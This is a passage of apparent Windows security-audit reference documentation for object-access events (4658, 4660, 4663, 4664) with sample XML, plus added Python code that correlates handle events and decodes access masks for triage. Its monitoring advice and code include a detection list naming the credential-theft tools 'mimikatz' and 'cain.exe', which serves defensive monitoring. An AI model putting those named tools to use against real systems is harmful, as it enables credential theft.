Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “close object’s handle” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “close object’s handle” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate this event with other events that might contain the same Handle ID, for example, “4663(S): An attempt was made to access an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that requested that the handle be closed. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column). If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.

Security Monitoring Recommendations

For 4658(S): The handle to an object was closed.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Typically this event has little to no security relevance and is hard to parse or analyze. There is no recommendation for this event, unless you know exactly what you need to monitor with it.
This event can be used to track all actions or operations related to a specific object handle.
If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with “Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz” or “cain.exe”), check for these substrings in “Process Name.”
4660(S): An object was deleted.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit Kernel Object, and Audit Registry
Event Description:
This event generates when an object was deleted. The object could be a file system, kernel, or registry object.
This event generates only if “Delete" auditing is set in the object’s SACL.
This event doesn’t contain the name of the deleted object (only the Handle ID). It is better to use “4663(S): An attempt was made to access an object” with DELETE access to track object deletion.
The advantage of this event is that it’s generated only during real delete operations. In contrast, “4663(S): An attempt was made to access an object” also generates during other actions, such as object renaming.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4660</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-18T21:05:28.677152100Z" />
<EventRecordID>270188</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="3060" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x4367b</Data>
<Data Name="ObjectServer">Security</Data>
<Data Name="HandleId">0x1678</Data>
<Data Name="ProcessId">0xef0</Data>
<Data Name="ProcessName">C:\\Windows\\explorer.exe</Data>
<Data Name="TransactionId">{00000000-0000-0000-0000-000000000000}</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “delete object” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “delete object” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate this event with other events that might contain the same Handle ID, for example, “4663(S): An attempt was made to access an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that deleted the object. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column). If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Transaction ID [Type = GUID]: unique GUID of the transaction. This field can help you correlate this event with other events that might contain the same Transaction ID, such as “4656(S, F): A handle to an object was requested.” This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-0000-000000000000}”.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify resources, activities or instances.
Security Monitoring Recommendations

For 4660(S): An object was deleted.
This event doesn’t contain the name of the deleted object (only the Handle ID). It is better to use “4663(S): An attempt was made to access an object.” events with DELETE access to track object deletion actions.
For kernel objects, this event and other auditing events have little to no security relevance and are hard to parse or analyze. There is no recommendation for auditing them, unless you know exactly what you need to monitor at the Kernel objects level.
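Putting the two preceding notes into practice, as an added example that is not part of the Windows documentation: the 4658 section says the event is mainly useful for learning how long a handle stayed open, and the 4660 section says the event carries no object name. Both are answered by joining 4656, 4663, 4660 and 4658 on Process ID plus Handle ID, and by closing a session on 4658, because a process can reuse the same handle value after a close. The Python below does that over a few constructed sample events modelled on the XML on this page; the timestamps, the second handle and the AccessMask values are assumptions made for the demo, not recorded events.

```python
"""Join 4656/4663/4660/4658 on (Process ID, Handle ID).

Added example for the audit-event reference on this page; not Microsoft code.
The sample events below are constructed for the demo and carry only the
fields the logic needs.
"""
from datetime import datetime
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
DELETE = 0x10000  # DELETE access right, Table 15


def _event_xml(event_id, system_time, data):
    """Build a minimal Security-channel event in the XML layout shown on this page."""
    body = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<TimeCreated SystemTime="{system_time}"/></System>'
            f'<EventData>{body}</EventData></Event>')


# Constructed sample stream (assumed values). Handle 0x1678 in explorer.exe is
# opened, used with DELETE, the object is deleted, and the handle is closed.
# Handle 0x1bc in notepad.exe is opened, written to, and closed without a delete.
SAMPLE_XML = [
    _event_xml(4656, "2015-09-18T21:05:28.100000000Z", {
        "SubjectUserName": "dadmin", "ObjectType": "File",
        "ObjectName": "C:\\Documents\\HBI Data.txt", "HandleId": "0x1678",
        "AccessMask": "0x10080", "ProcessId": "0xef0",
        "ProcessName": "C:\\Windows\\explorer.exe"}),
    _event_xml(4663, "2015-09-18T21:05:28.400000000Z", {
        "SubjectUserName": "dadmin", "ObjectType": "File",
        "ObjectName": "C:\\Documents\\HBI Data.txt", "HandleId": "0x1678",
        "AccessMask": "0x10000", "ProcessId": "0xef0",
        "ProcessName": "C:\\Windows\\explorer.exe"}),
    _event_xml(4660, "2015-09-18T21:05:28.677152100Z", {
        "SubjectUserName": "dadmin", "HandleId": "0x1678",
        "ProcessId": "0xef0", "ProcessName": "C:\\Windows\\explorer.exe"}),
    _event_xml(4658, "2015-09-18T21:05:29.910000000Z", {
        "SubjectUserName": "dadmin", "HandleId": "0x1678",
        "ProcessId": "0xef0", "ProcessName": "C:\\Windows\\explorer.exe"}),
    _event_xml(4656, "2015-09-18T22:13:54.500000000Z", {
        "SubjectUserName": "dadmin", "ObjectType": "File",
        "ObjectName": "C:\\Documents\\Notes.txt", "HandleId": "0x1bc",
        "AccessMask": "0x6", "ProcessId": "0x458",
        "ProcessName": "C:\\Windows\\System32\\notepad.exe"}),
    _event_xml(4663, "2015-09-18T22:13:54.770429700Z", {
        "SubjectUserName": "dadmin", "ObjectType": "File",
        "ObjectName": "C:\\Documents\\Notes.txt", "HandleId": "0x1bc",
        "AccessMask": "0x6", "ProcessId": "0x458",
        "ProcessName": "C:\\Windows\\System32\\notepad.exe"}),
    _event_xml(4658, "2015-09-18T22:13:55.500000000Z", {
        "SubjectUserName": "dadmin", "HandleId": "0x1bc",
        "ProcessId": "0x458", "ProcessName": "C:\\Windows\\System32\\notepad.exe"}),
]


def parse_system_time(value):
    """Parse the SystemTime attribute; its 100 ns fraction is truncated to microseconds."""
    main, _, frac = value.rstrip("Z").partition(".")
    stamp = datetime.strptime(main, "%Y-%m-%dT%H:%M:%S")
    return stamp.replace(microsecond=int((frac + "000000")[:6]))


def track_handles(xml_events):
    """Return one session dict per handle, in open order.

    4656 starts a session; 4663 records the access mask actually used and fills
    in the object name if the 4656 was missed; 4660 marks the deletion; 4658
    ends the session, after which the process may reuse the same Handle ID.
    """
    sessions, open_handles = [], {}
    for xml in xml_events:
        root = ET.fromstring(xml)
        event_id = int(root.find("e:System/e:EventID", NS).text)
        when = parse_system_time(root.find("e:System/e:TimeCreated", NS).get("SystemTime"))
        data = {d.get("Name"): d.text for d in root.findall("e:EventData/e:Data", NS)}
        key = (data["ProcessId"], data["HandleId"])
        session = open_handles.get(key)
        if event_id == 4656 or session is None:
            # New handle, or a handle whose 4656 was not logged (for example
            # opened before auditing started): start a session either way.
            session = {"object": data.get("ObjectName"), "process": data["ProcessName"],
                       "user": data.get("SubjectUserName"),
                       "opened": when if event_id == 4656 else None,
                       "closed": None, "access_masks": [], "deleted": False}
            sessions.append(session)
            open_handles[key] = session
            if event_id == 4656:
                continue
        if event_id == 4663:
            session["access_masks"].append(int(data["AccessMask"], 16))
            session["object"] = session["object"] or data.get("ObjectName")
        elif event_id == 4660:
            session["deleted"] = True
        elif event_id == 4658:
            session["closed"] = when
            open_handles.pop(key, None)
    return sessions


def deleted_objects(sessions):
    """Object names recovered for 4660 events, with the deleting process."""
    return [(s["object"], s["process"]) for s in sessions if s["deleted"]]


def handle_lifetimes(sessions):
    """Seconds each handle stayed open, keyed by object name (fully observed handles only)."""
    return {s["object"]: (s["closed"] - s["opened"]).total_seconds()
            for s in sessions if s["closed"] is not None and s["opened"] is not None}


if __name__ == "__main__":
    tracked = track_handles(SAMPLE_XML)
    for obj, proc in deleted_objects(tracked):
        print(f"deleted: {obj} by {proc}")
    for obj, secs in handle_lifetimes(tracked).items():
        print(f"{obj}: handle open {secs:.3f} s")
```

The 4660 row never carries a name, so the name printed for the deletion comes from the 4656 (or the DELETE-access 4663) that shares its Process ID and Handle ID; a 4660 that arrives with no open session is kept as a nameless session rather than dropped, which is the case to investigate.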
4663(S): An attempt was made to access an object.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit Kernel Object, Audit Registry, and Audit Removable Storage
Event Description:
This event indicates that a specific operation was performed on an object. The object could be a file system, kernel, or registry object, or a file system object on removable storage or a device.
This event generates only if the object’s SACL has the required ACE to handle the specific access right use.
The main difference with “4656: A handle to an object was requested.” is that 4663 shows that the access right was used instead of just requested, and 4663 doesn’t have Failure events.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4663</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-18T22:13:54.770429700Z" />
<EventRecordID>273866</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="524" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x4367b</Data>
<Data Name="ObjectServer">Security</Data>
<Data Name="ObjectType">File</Data>
<Data Name="ObjectName">C:\\Documents\\HBI Data.txt</Data>
<Data Name="HandleId">0x1bc</Data>
<Data Name="AccessList">%%4417 %%4418</Data>
<Data Name="AccessMask">0x6</Data>
<Data Name="ProcessId">0x458</Data>
<Data Name="ProcessName">C:\\Windows\\System32\\notepad.exe</Data>
<Data Name="ResourceAttributes">S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions:
0 - Windows Server 2008, Windows Vista.
1 - Windows Server 2012, Windows 8. Added “Resource Attributes” field.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made an attempt to access an object. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made an attempt to access an object.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Object Type [Type = UnicodeString]: The type of object that was accessed during the operation. The most common Object Types are: DIRECTORY, EVENT, TIMER, DEVICE, Mutant, Type, File, Token, Thread, Section, WindowStation, DebugObject, FilterCommunicationPort, EventPair, Driver, IoCompletion, Controller, SymbolicLink, WmiGuid, Process, Profile, Desktop, KeyedEvent, Adapter, Key, WaitablePort, Callback, Semaphore, Job, Port, FilterConnectionPort, ALPC Port.
Object Name [Type = UnicodeString]: name and other identifying information for the object for which access was requested. For example, for a file, the path would be included.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can be used for correlation with other events, for example with the Handle ID field in “4656(S, F): A handle to an object was requested.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Resource Attributes [Type = UnicodeString] [Version 1]: attributes associated with the object. For some objects, the field does not apply and “-“ is displayed. For example, for a file, the following might be displayed: S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000)), where Impact_MS is the Resource Property ID and 3000 is the Resource Property Value.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that accessed the object. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column). If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Access Request Information:
Accesses [Type = UnicodeString]: the list of access rights which were used by Subject\Security ID. These access rights depend on Object Type. The following table contains information about the most common access rights for file system objects. Access rights for registry objects are often similar to file system objects, but the table contains a few notes about how they vary. Each entry gives the access name, then its hex value and access schema value in brackets, then the description.

ReadData (or ListDirectory) [0x1, %%4416]: ReadData - For a file object, the right to read the corresponding file data. For a directory object, the right to read the corresponding directory data. ListDirectory - For a directory, the right to list the contents of the directory. For registry objects, this is “Query key value.”

WriteData (or AddFile) [0x2, %%4417]: WriteData - For a file object, the right to write data to the file. For a directory object, the right to create a file in the directory (FILE_ADD_FILE). AddFile - For a directory, the right to create a file in the directory. For registry objects, this is “Set key value.”

AppendData (or AddSubdirectory or CreatePipeInstance) [0x4, %%4418]: AppendData - For a file object, the right to append data to the file. (For local files, write operations will not overwrite existing data if this flag is specified without FILE_WRITE_DATA.) For a directory object, the right to create a subdirectory (FILE_ADD_SUBDIRECTORY). AddSubdirectory - For a directory, the right to create a subdirectory. CreatePipeInstance - For a named pipe, the right to create a pipe.

ReadEA [0x8, %%4419]: The right to read extended file attributes. For registry objects, this is “Enumerate sub-keys.”

WriteEA [0x10, %%4420]: The right to write extended file attributes.

Execute/Traverse [0x20, %%4421]: Execute - For a native code file, the right to execute the file. This access right given to scripts may cause the script to be executable, depending on the script interpreter. Traverse - For a directory, the right to traverse the directory. By default, users are assigned the BYPASS_TRAVERSE_CHECKING privilege, which ignores the FILE_TRAVERSE access right. See the remarks in File Security and Access Rights for more information.

DeleteChild [0x40, %%4422]: For a directory, the right to delete a directory and all the files it contains, including read-only files.

ReadAttributes [0x80, %%4423]: The right to read file attributes.

WriteAttributes [0x100, %%4424]: The right to write file attributes.

DELETE [0x10000, %%1537]: The right to delete the object.

READ_CONTROL [0x20000, %%1538]: The right to read the information in the object's security descriptor, not including the information in the system access control list (SACL).

WRITE_DAC [0x40000, %%1539]: The right to modify the discretionary access control list (DACL) in the object's security descriptor.

WRITE_OWNER [0x80000, %%1540]: The right to change the owner in the object's security descriptor.

SYNCHRONIZE [0x100000, %%1541]: The right to use the object for synchronization. This enables a thread to wait until the object is in the signaled state. Some object types do not support this access right.

ACCESS_SYS_SEC [0x1000000, %%1542]: The ACCESS_SYS_SEC access right controls the ability to get or set the SACL in an object's security descriptor.

Table 15. File System objects access rights.

Access Mask [Type = HexInt32]: hexadecimal mask for the requested or performed operation. For more information, see the preceding table.

Security Monitoring Recommendations

For 4663(S): An attempt was made to access an object.
For kernel objects, this event and other auditing events have little to no security relevance and are hard to parse or analyze. There is no recommendation for auditing them, unless you know exactly what you need to monitor at the Kernel objects level.
For other types of objects, the following recommendations apply.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have critical file system objects for which you need to monitor all access attempts, monitor this event for Object Name.
If you have critical file system objects for which you need to monitor certain access attempts (for example, write actions), monitor this event for Object Name in relation to Access Request Information\Accesses.
If you have file system objects with specific attributes, for which you need to monitor access attempts, monitor this event for Resource Attributes.
If Object Name is a sensitive or critical registry key for which you need to monitor specific access attempts (for example, only write actions), monitor for all 4663 events with the corresponding Access Request Information\Accesses.
If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with “Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz” or “cain.exe”), check for these substrings in “Process Name.”
For file system objects, we recommend that you monitor for these Access Request Information\Accesses rights:
WriteData (or AddFile)
AppendData (or AddSubdirectory or CreatePipeInstance)
WriteEA
DeleteChild
WriteAttributes
DELETE
WRITE_DAC
WRITE_OWNER
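The monitoring recommendations for 4656 and 4663 above, together with the Access Mask, Accesses and Resource Attributes fields and Table 15, are mechanical enough to turn into a triage function. The following Python is an added example, not code from the Windows documentation: it decodes an Access Mask into the Table 15 names, maps the %%-coded Accesses list the same way, parses the Resource Attributes SDDL fragment, and applies the write-rights and process-name checks recommended above. The sample events, the extra C:\Windows\ and \AppData\Local\Temp\ folder entries, and the watched Impact_MS value of 3000 are assumptions made for the demo, not policy from the page.

```python
"""Decode 4656/4663 access masks (Table 15) and apply the process-name and
write-rights recommendations above.

Added example for this page, not Microsoft code. Sample events are
constructed; the extra folder entries and the watched attribute are assumptions.
"""
import re

# Table 15: bit -> (access name, access schema / message-table code)
FILE_ACCESS_RIGHTS = {
    0x1: ("ReadData (or ListDirectory)", "%%4416"),
    0x2: ("WriteData (or AddFile)", "%%4417"),
    0x4: ("AppendData (or AddSubdirectory or CreatePipeInstance)", "%%4418"),
    0x8: ("ReadEA", "%%4419"),
    0x10: ("WriteEA", "%%4420"),
    0x20: ("Execute/Traverse", "%%4421"),
    0x40: ("DeleteChild", "%%4422"),
    0x80: ("ReadAttributes", "%%4423"),
    0x100: ("WriteAttributes", "%%4424"),
    0x10000: ("DELETE", "%%1537"),
    0x20000: ("READ_CONTROL", "%%1538"),
    0x40000: ("WRITE_DAC", "%%1539"),
    0x80000: ("WRITE_OWNER", "%%1540"),
    0x100000: ("SYNCHRONIZE", "%%1541"),
    0x1000000: ("ACCESS_SYS_SEC", "%%1542"),
}
CODE_TO_NAME = {code: name for name, code in FILE_ACCESS_RIGHTS.values()}
KNOWN_BITS = sum(FILE_ACCESS_RIGHTS)  # bits are disjoint, so the sum is their OR

# Rights the recommendations single out for file system objects.
WRITE_CLASS_MASK = 0x2 | 0x4 | 0x10 | 0x40 | 0x100 | 0x10000 | 0x40000 | 0x80000

# Process-name baselines from the recommendations. System32, Program Files and
# Temporary Internet Files come from the page; C:\Windows\ and the user Temp
# folder are assumptions added for the demo.
STANDARD_FOLDERS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
RESTRICTED_FOLDERS = ("\\temporary internet files\\", "\\appdata\\local\\temp\\")
RESTRICTED_SUBSTRINGS = ("mimikatz", "cain.exe")

# Matches each ("Name",Type,Flags,Values) resource attribute inside an RA ACE.
_RESOURCE_ATTR = re.compile(r'\("([^"]+)",(\w+),(0x[0-9A-Fa-f]+),([^)]*)\)')


def decode_access_mask(mask):
    """Return (Table 15 names for the set bits, leftover bits not in the table)."""
    names = [name for bit, (name, _) in sorted(FILE_ACCESS_RIGHTS.items()) if mask & bit]
    return names, mask & ~KNOWN_BITS


def decode_access_list(access_list):
    """Map the %%-coded Accesses field ("%%4417 %%4418") to Table 15 names."""
    return [CODE_TO_NAME.get(code, code) for code in access_list.split()]


def parse_resource_attributes(field):
    """Parse the Resource Attributes SDDL fragment; "-" yields an empty list."""
    return [{"name": name, "type": kind, "flags": int(flags, 16), "values": values.split(",")}
            for name, kind, flags, values in _RESOURCE_ATTR.findall(field)]


def process_name_findings(process_name):
    """Apply the three process-name checks from the recommendations."""
    path = process_name.lower()
    findings = []
    if not path.startswith(STANDARD_FOLDERS):
        findings.append("process outside System32/Program Files")
    if any(folder in path for folder in RESTRICTED_FOLDERS):
        findings.append("process in restricted folder")
    if any(word in path for word in RESTRICTED_SUBSTRINGS):
        findings.append("restricted substring in process name")
    return findings


def triage_4663(event, watched_attributes=None):
    """Summarize one 4663 (or 4656) event dict against the recommendations.

    watched_attributes maps a Resource Property ID to the value that marks an
    object as sensitive, for example {"Impact_MS": "3000"} (assumed policy).
    """
    mask = int(event["AccessMask"], 16)
    names, unknown = decode_access_mask(mask)
    findings = []
    write_names, _ = decode_access_mask(mask & WRITE_CLASS_MASK)
    if write_names:
        findings.append("write-class access: " + ", ".join(write_names))
    if unknown:
        findings.append(f"access bits not in Table 15: {unknown:#x}")
    findings += process_name_findings(event["ProcessName"])
    for attr in parse_resource_attributes(event.get("ResourceAttributes", "-")):
        if watched_attributes and watched_attributes.get(attr["name"]) in attr["values"]:
            findings.append(f"watched attribute {attr['name']}={','.join(attr['values'])}")
    return {"object": event["ObjectName"], "accesses": names, "findings": findings}


# Constructed sample events: the first mirrors the 4663 XML on this page, the
# second is an assumed read from a tool dropped in the user's Temp folder.
SAMPLE_4663 = [
    {"ObjectName": "C:\\Documents\\HBI Data.txt", "AccessMask": "0x6",
     "ProcessName": "C:\\Windows\\System32\\notepad.exe",
     "ResourceAttributes": 'S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))'},
    {"ObjectName": "C:\\Documents\\HBI Data.txt", "AccessMask": "0x80",
     "ProcessName": "C:\\Users\\dadmin\\AppData\\Local\\Temp\\mimikatz.exe",
     "ResourceAttributes": "-"},
]

if __name__ == "__main__":
    for event in SAMPLE_4663:
        print(triage_4663(event, {"Impact_MS": "3000"}))
```

Decoding the mask rather than matching on the %%-coded Accesses string keeps the check independent of message-table rendering, and the leftover-bits value catches object types whose rights are not in Table 15 (registry keys reuse several low bits with different meanings, which is why the page notes that registry rights "vary").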
4664(S): An attempt was made to create a hard link.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit File System
Event Description:
This event generates when an NTFS hard link was successfully created.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4664</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-21T23:50:26.871375900Z" />
<EventRecordID>276680</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="2624" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x43659</Data>
<Data Name="FileName">C:\\notepad.exe</Data>
<Data Name="LinkName">C:\\Docs\\My.exe</Data>
<Data Name="TransactionId">{00000000-0000-0000-0000-000000000000}</Data>
</EventData>
</Event>
Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID ]: SID of account that made an attempt to create the hard link. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made an attempt to create the hard
link.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Link Information:
File Name [Type = UnicodeString]: the name of the file or folder that the new hard link refers to.
Link Name [Type = UnicodeString]: full path name of the new hard link.
Transaction ID [Type = GUID]: unique GUID of the transaction. This field can help you correlate this event with other events that might contain the same Transaction ID, such as “4660(S): An object was deleted.” This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-0000-000000000000}”.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

Security Monitoring Recommendations


For 4664(S): An attempt was made to create a hard link.
We recommend monitoring for any 4664 event, because this action is not typical for normal operating system behavior and can be a sign of malicious activity.
4985(S): The state of a transaction has changed.

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit Non Sensitive Privilege Use, Audit Other Privilege Use Events, and Audit Sensitive Privilege Use
Event Description:
This is an informational event from the file system Transaction Manager.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4985</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-19T00:00:40.099093300Z" />
<EventRecordID>274277</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="5048" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
